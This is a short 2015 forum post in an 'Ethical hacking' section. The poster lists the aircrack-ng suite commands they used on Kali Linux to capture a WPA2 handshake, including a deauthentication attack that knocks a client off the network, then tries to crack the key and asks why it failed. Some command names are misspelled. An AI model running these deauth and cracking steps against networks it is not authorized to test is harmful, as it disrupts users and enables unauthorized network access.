WPA2 valid key out of handshake

Discussion in 'Ethical hacking' started by 2big2fail, Nov 18, 2015.

  1. 2big2fail

    2big2fail New Member

    Joined:
    Nov 18, 2015
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    my goal is it to figure out the valid key of the WPA2.

    I am using Kali Linux.

    how I proceeded:

    ->airmon-ng

    ->airman-ng start wlan0

    ->airodump-ng wlan0mon

    ->airodump-ng -w capture --bssid 00:00:00:00:00:00(SSID of AP) -c 1 wlan0mon

    now I want to make a handshake:

    ->airplay-ng --deauth 3 -a 00:00:00:00:00:00(SSID of AP) -c 00:00:00:00:00:00(SSID of client) wlan0mon

    now I want to crack the handshake:

    ->aircrack-ng capture-01.cap -J capture-01

    the key was not found...
    what is the problem? do I need more frames? any hints?
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice